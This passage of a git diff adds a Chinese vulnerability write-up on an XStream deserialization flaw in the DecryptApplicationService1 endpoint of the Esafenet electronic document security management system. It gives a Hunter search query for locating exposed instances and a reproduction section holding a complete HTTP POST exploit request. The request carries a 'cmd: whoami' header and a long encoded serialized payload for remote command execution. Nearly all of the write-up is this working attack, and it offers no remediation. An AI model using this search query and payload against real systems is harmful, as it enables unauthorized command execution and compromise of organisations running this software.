+![1706606939826-c9da39b5-0564-4cc3-ab95-c276b4ec133b.png](./img/Fv6jdjorzsAlhpvz/1706606939826-c9da39b5-0564-4cc3-ab95-c276b4ec133b-738059.png)
+
+
+
+> 更新: 2024-04-20 22:01:31  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zgeegd6ivf61zsv6>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统DecryptApplicationService1存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统DecryptApplicationService1存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..9e8c3db
--- /dev/null
+++ b/亿赛通电子文档安全管理系统DecryptApplicationService1存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统DecryptApplicationService1存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统DecryptApplicationService1存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/IibT0D1-9oe0dU9a/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-089149.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/DecryptApplicationService1 HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
